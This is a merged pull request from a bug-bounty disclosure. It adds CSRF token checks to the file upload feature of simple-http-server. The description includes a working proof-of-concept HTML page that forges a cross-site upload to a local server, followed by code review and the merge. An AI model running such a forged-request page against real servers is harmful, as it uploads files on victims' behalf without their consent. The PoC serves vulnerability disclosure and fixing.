### PR TITLE
Generate CSRF token when upload feature enabled

### PR DESCRIPTION
**Pull request by doshmajhan**
### ⚙️ Description *

The 'upload' feature in simple-http-server is vulnerable to cross-site request forgery, it doesn't authenticate the user and just uploads the files which are given to it. If the upload feature is enabled, it can allow attackers to craft web pages and if victims interact with attackers' web pages then a cross-site request can be sent to the website by simple-http-server and a file can be uploaded on behalf of the victim.

The change here generates a CSRF token when the `--upload` flag is passed and displays it to the user as well as embedding it in the HTML page for the directory listing. If the `csrf` parameter is not passed or does not match the generated one when uploading a file, the request will be rejected with a 400.

### 🐛 Proof of Concept (PoC) *
Start a web server with --upload as an argument that enables uploading functionality.
Save the following PoC.html and open it in a browser.
Click on "Submit Request".
Observe that a file was uploaded, you can check the webroot and see the newly uploaded file.
In this process, authentication wasn't required and with minimal user interaction, a file can be uploaded on behalf of the victim.
```
<!-- PoC.html -->

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/localhost:8000\/", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------355111547139502215671973431497");
        xhr.withCredentials = true;
        var body = "-----------------------------355111547139502215671973431497\r\n" + 
          "Content-Disposition: form-data; name=\"files\"; filename=\"file.txt\"\r\n" + 
          "Content-Type: text/plain\r\n" + 
          "\r\n" + 
          "hello pwned\r\n\r\n" + 
          "-----------------------------355111547139502215671973431497--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
```
### 🔥 Proof of Fix (PoF) *

In the attached screenshot you'll see that the request generated by clicking `Submit Request` in the `PoC.html` failed with a  400 due to not providing a CSRF token.

Screenshot from 2021-04-08 17-11-04

### CODE REVIEW

**Comment by huntr-helper** [comment]
👋 Hello, @TheWaWaR. @doshmajhan has opened a PR to us with a fix for a potential vulnerability in your repository. To view the vulnerability, please refer to the bounty URL in the first comment, above. If you want this fix in your repository, a PR will automatically open once you comment:

#### `@huntr-helper - LGTM`

---

#### ☎️ Need further support?

Come and join us on our community [Discord](https://huntr.dev/discord)!

---

#### ❓@TheWaWaR - want more fixes like this?

Copy this snippet into your `README.md` for more vulnerability fixes in the future:

```[huntr](https://huntr.dev)```

[huntr](https://huntr.dev)

File: src/main.rs [hunk 1]
```diff
@@ -485,26 +508,65 @@ impl MainHandler {
...
-                                let mut data = field.data.readable().unwrap();
-                                let headers = &field.headers;
-                                let mut target_path = path.clone();
-
-                                target_path.push(headers.filename.clone().unwrap());
-                                if let Err(errno) = std::fs::File::create(target_path)
-                                    .and_then(|mut file| io::copy(&mut data, &mut file))
-                                {
+                        // Pull out csrf field to check if token matches one generated
+                        let csrf_field = match entries.fields.get("csrf") {
```
Comment (TheWaWaR) [inline src/main.rs]:
``` rust
match entries.fields.get("csrf").map(|fiels| fields.first()).unwrap_or(None) {
    Some(field) => field,
    None => return Err(xxx);
}
```

Comment (doshmajhan) [reply src/main.rs]: Updated, please take another look!

**Comment by TheWaWaR** [comment]
LGTM.

**Comment by doshmajhan** [comment]
> LGTM.

Awesome! If you want the PR to automatically open against the main repo you can comment `@huntr-helper - LGTM`

**Comment by JamieSlome** [comment]
@huntr-helper - LGTM

**Pull request merged**